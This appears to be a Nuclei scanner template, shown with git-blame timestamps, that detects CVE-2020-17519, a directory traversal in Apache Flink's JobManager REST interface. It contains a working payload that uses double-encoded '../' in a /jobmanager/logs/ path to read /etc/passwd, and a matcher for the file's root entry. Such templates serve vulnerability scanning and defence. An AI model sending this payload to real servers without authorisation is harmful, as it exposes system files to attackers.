2021-01-06 07:08:41 +00:00
id : CVE-2020-17519
info :
name : Apache Flink directory traversal
2021-04-06 06:46:11 +00:00
author : pdteam
2021-01-06 07:08:41 +00:00
severity : high
description : A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process.
2022-04-22 10:38:41 +00:00
reference :
- https://github.com/B1anda0/CVE-2020-17519
2022-05-17 09:18:12 +00:00
- https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d%40%3Cdev.flink.apache.org%3E
- https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d@%3Cdev.flink.apache.org%3E
- https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d@%3Cuser.flink.apache.org%3E
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-17519
cwe-id : CWE-552
2022-04-22 10:38:41 +00:00
tags : cve,cve2020,apache,lfi,flink
2021-01-06 07:08:41 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : regex
regex :
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2021-01-06 07:08:41 +00:00
part : body